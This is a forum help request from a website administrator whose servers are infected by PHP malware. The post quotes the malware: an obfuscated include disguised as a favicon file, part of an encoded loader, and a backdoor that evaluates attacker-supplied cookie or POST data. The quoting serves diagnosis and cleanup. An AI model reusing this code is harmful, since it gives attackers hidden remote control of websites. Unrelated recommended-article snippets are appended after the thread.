求助!一个病毒入侵了公司所有网站,实在没有办法彻底清除!请大神帮助。

jansonren 2018-04-11 11:11:36
病毒特征
1.一旦入侵服务器的某个网站就会把服务器下所有网站而已修改。甚至会修改目录权限。
2.会自动生成含如下代码的index.php文件,同时会在各种目录下生成favicon_*.ico的文件。
经过反编译后是一个伪装成ico文件的代码。
<?php
/*f969b*/
@include "\x6ct\x2fs\x65a\x72c\x68/\x66a\x76i\x63o\x6e_\x37f\x652\x336\x2ei\x63o";
/*f969b*/


ico文件内容如下:

<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

$lysoa = 3298; function yhdjugyza($xcqtszj, $qbqxxjvsbm){$egiafr = ''; for($i=0; $i < strlen($xcqtszj); $i++){$egiafr .= isset($qbqxxjvsbm[$xcqtszj[$i]]) ? $qbqxxjvsbm[$xcqtszj[$i]] : $xcqtszj[$i];}
$omlgrnwny="rawurl" . "decode";return $omlgrnwny($egiafr);}
$leqvta = '%SU%Se%SU%Se%ASNiN_9CM%6r%6EC55P5_XPQ%6E%6H%6Scb00%6f%BD%SU%S'.
'e%ASNiN_9CM%6r%6EXPQ_C55P59%6E%6H%6SS%6f%BD%SU%Se%ASNiN_9CM%6r%6EkW8_C8CL3MNPi_MNkC%6E%6H%6'.
'SS%6f%BD%SU%Se%ASC55P5_5CoP5MNiQ%6rS%6f%BD%SU%Se%AS9CM_MNkC_XNkNM%6rS%6f%BD%SU%Se%SU%Se%SU%SeN7%6r'.
'%6vlC7NiCl%6r%66ngn_KY0%66%6f%6f%SU%Se%ED%SU%Se%6S%6S%6S%'.
'6SlC7NiC%6r%66ngn_KY0%66%6H%6S%66%qHi%66%6f%BD%SU%Se%EU%SU%Se%SU%SeN7%6r'.
'%6vlC7NiCl%6r%66UzxKH1YxZ_OKnexe1Yx%66%6f%6f%SU%Se%ED%SU%Se%6S%6S%6S%6SlC7NiC%'.
'6r%66UzxKH1YxZ_OKnexe1Yx%66%6H%6S%66/%66%6f%BD%SU%Se%EU%SU%Se%SU%SeN'.
'7%6S%6r%6vlC7NiCl%6r%6Ee0xKeUZ_xbc_vAALrEL7V6BpWr6WW7NVr5NW'.


3.会把index.html文件修改为index.html.bak.bak文件。同时生成index.php文件。
并在index.php文件里用代码指向index.html.bak.bak文件。

4.会在某些目录生成类似下面文件名的病毒文件。
article19.php
dirs25.php
files94.php
page30.php

部分代码如下
$jfwek = 'yvxr_o0943mfneiuHkd\'5-#s17b8t2c*lapg';$mdcrdy = Array();$mdcrdy[] = $jfwek[16].$jfwek[31];$mdcrdy[] = $jfwek[22];$mdcrdy[] = $jfwek[24].$jfwek[27].$jfwek[25].$jfwek[7].$jfwek[6].$jfwek[29].$jfwek[11].$jfwek[20].$jfwek[21].$jfwek[9].$jfwek[7].$jfwek[18].$jfwek[29].$jfwek[21].$jfwek[8].$jfwek[33].$jfwek[7].$jfwek[30].$jfwek[21].$jfwek[7].$jfwek[13].$jfwek[33].$jfwek[30].$jfwek[21].$jfwek[8].$jfwek[18].$jfwek[24].$jfwek[30].$jfwek[9].$jfwek[13].$jfwek[25].$jfwek[11].$jfwek[26].$jfwek[20].$jfwek[24].$jfwek[33];$mdcrdy[] = $jfwek[30].$jfwek[5].$jfwek[15].$jfwek[12].$jfwek[28];$mdcrdy[] = $jfwek[23].$jfwek[28].$jfwek[3].$jfwek[4].$jfwek[3].$jfwek[13].$jfwek[34].$jfwek[13].$jfwek[33].$jfwek[28];$mdcrdy[] = $jfwek[13].$jfwek[2].$jfwek[34].$jfwek[32].$jfwek[5].$jfwek[18].$jfwek[13];$mdcrdy[] = $jfwek[23].$jfwek[15].$jfwek[26].$jfwek[23].$jfwek[28].$jfwek[3];$mdcrdy[] = $jfwek[33].$jfwek[3].$jfwek[3].$jfwek[33].$jfwek[0].$jfwek[4].$jfwek[10].$jfwek[13].$jfwek[3].$jfwek[35].$jfwek[13];$mdcrdy[] = $jfwek[23].$jfwek[28].$jfwek[3].$jfwek[32].$jfwek[13].$jfwek[12];$mdcrdy[] = $jfwek[34].$jfwek[33].$jfwek[30].$jfwek[17];foreach ($mdcrdy[7]($_COOKIE, $_POST) as $eyynwg => $qynibe){function bqjwgy($mdcrdy, $eyynwg, $cavxuf){return $mdcrdy[6]($mdcrdy[4]($eyynwg . $mdcrdy[2], ($cavxuf / $mdcrdy[8]($eyynwg)) + 1), 0, $cavxuf);}function cicqtnb($mdcrdy, $ubxwmgg){return @$mdcrdy[9]($mdcrdy[0], $ubxwmgg);}function tlxhk($mdcrdy, $ubxwmgg){$bfvwkb = $mdcrdy[3]($ubxwmgg) % 3;if (!$bfvwkb) {eval($ubxwmgg[1]($ubxwmgg[2]));exit();}}$qynibe = cicqtnb($mdcrdy, $qynibe);tlxhk($mdcrdy, $mdcrdy[5]($mdcrdy[1], $qynibe ^ bqjwgy($mdcrdy, $eyynwg, $mdcrdy[8]($qynibe))));}


以上是我总结的部分特征。也许还有没发现的。
不知道论坛里的其他站长又没有遇到类似情况。手动清楚已经超出了劳动极限。只要一个文件没处理第二天照样会生成一大片病毒文件。已经超出了我的技术能力。希望那位热心的朋友帮助解决一下。哪怕是指点一下都好。
...全文
2163 3 打赏 收藏 转发到动态 举报
写回复
用AI写文章
3 条回复
切换为时间正序
请发表友善的回复…
发表回复
时光难逆 2019-03-22
  • 打赏
  • 举报
 回复
一般这种情况就是网站被挂马了,看你描述要不是你没找要不就是能被遍历的网页都被篡改了,找专业的咨询吧
Dame1998 2018-12-17
  • 打赏
  • 举报
 回复
公司得疯 报警把
sixgj 2018-04-13
  • 打赏
  • 举报
 回复
厉害的病毒。
CentOs7网卡配置文件修改无效
代码转载自:https://pan.quark.cn/s/8ce4326d996e 对于在 CentOS 7 系统中修改网卡配置文件后无法使设置生效的情况,经过实践验证,可以通过使用 nmcli 命令来进行调整。完成修改之后,需要重新启动虚拟机以使更改生效,这样操作流程即告完成。如果设置仍然无法生效,则表明虚拟机在启动过程中所获取的 IP 地址配置并非针对 eth0,此时可以对其它网卡的配置文件进行修改或将其移除。在 CentOS 7 系统中,网络配置的管理机制与早期版本存在差异,主要体现为采用了 Network Manager 服务来负责网络接口的管理。在某些情形下,尽管修改了 `/etc/sysconfig/network-scripts` 目录下的 `ifcfg-eth0` 文件,但网络配置却未能即时生效。此类问题的发生通常源于 CentOS 7 采用了不同于以往的配置读取方法。接下来将具体阐述如何借助 nmcli 命令来处理这一挑战。 以 root 用户身份登录系统并打开终端界面。nmcli 是 Network Manager 提供的命令行界面工具,它支持在命令行环境下执行网络连接的建立、编辑、查询及管理任务。针对修改 eth0 网卡配置的需求,可以遵循以下步骤进行操作: 1. 导航至 `/etc/sysconfig/network-scripts` 目录: ``` cd /etc/sysconfig/network-scripts ``` 2. 检查该目录内是否存在 `ifcfg-eth0.bak` 文件,该备份文件可能是先前调整配置时遗留下来的,若存在可能造成冲突。若发现该文件,可以选择将其删除: ``` [root@localhost netw...
网络管理教程入门至精通软件.txt
代码转载自:https://pan.quark.cn/s/46fd08fb879c 网管教程 从入门到精通软件篇 ★一。★详尽的xp修复控制台指令及其应用!!! 放入xp(2000)的光盘,安装时选择R,执行修复! Windows XP(涵盖 Windows 2000)的控制台指令是在系统遭遇某些意外状况时的一种极具效用的诊断、检测以及恢复系统功能的工具。笔者确实一直期望能够将这方面的指令进行归纳,此次由老范辛苦整理了这份极具价值的秘籍。 Bootcfg bootcfg 命令用于启动配置与故障恢复(对大多数计算机而言,即 boot.ini 文件)。 带有特定参数的 bootcfg 命令仅在运用故障恢复控制台时方可使用。能够在命令行界面下运用带有不同参数的 bootcfg 命令。 用法: bootcfg /default 设定默认引导选项。 bootcfg /add 向引导清单中增添 Windows 安装。 bootcfg /rebuild 重复整个 Windows 安装流程并让用户选择需添加的项目。 注意:运用 bootcfg /rebuild 之前,应先借助 bootcfg /copy 命令备份 boot.ini 文件。 bootcfg /scan 探查用于 Windows 安装的全部磁盘并展示结果。 注意:这些结果被静态存储,并用于当前会话。若在当前会话期间磁盘配置发生变动,为获取更新的探查结果,必须先重启计算机,然后再次探查磁盘。 bootcfg /list 列示引导清单中已有的项目。 bootcfg /disableredirect 在启动引导程序中禁用重定向。 bootcfg /redirect [ PortBaudRrate] |[ useBio...
Ansible playbook register参数详解[项目代码]
本文详细介绍了Ansible中register关键字的使用方法。register用于捕获任务输出并存储为变量,支持后续任务调用和条件判断。文章从基本用法入手,展示了如何通过shell模块注册变量并访问其stdout、stderr、rc等字段。接着讲解了基于register变量的条件判断,如使用stat模块检查文件存在性。针对复杂输出,介绍了通过Jinja2模板引擎访问嵌套字典和列表的方法,例如获取Docker容器状态。还涵盖了多任务注册,通过loop循环结合register批量处理文件检查。此外,文章说明了ignore_errors与register的配合使用,允许任务失败时仍捕获输出。最后通过实际示例演示了如何获取Python包列表并过滤版本号大于3.0的包。register功能强大,能显著提升Playbook的灵活性和健壮性。
鸿蒙App开发全流程实战[可运行源码]
本文介绍了《鸿蒙App开发全流程实战》一书,该书基于鸿蒙3.0操作系统,面向Web前端开发者,详细讲解了鸿蒙App开发的完整流程。内容涵盖鸿蒙操作系统背景、技术架构、开发环境搭建、JavaScript组件开发、分布式多终端App实战(如计划管理软件)、服务卡片、原子化服务、流转功能等。书中包含大量代码示例和视频讲解,并附赠源码及PPT。文章还提供了赠书活动信息,鼓励读者关注、点赞、收藏和评论以参与抽奖。作者为华为云特约编辑、CSDN博客专家,拥有丰富的开发经验。
易语言源码易语言考勤辅助工具源码
易语言源码易语言考勤辅助工具源码
安全技术/病毒

9,513

社区成员

28,941

社区内容

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章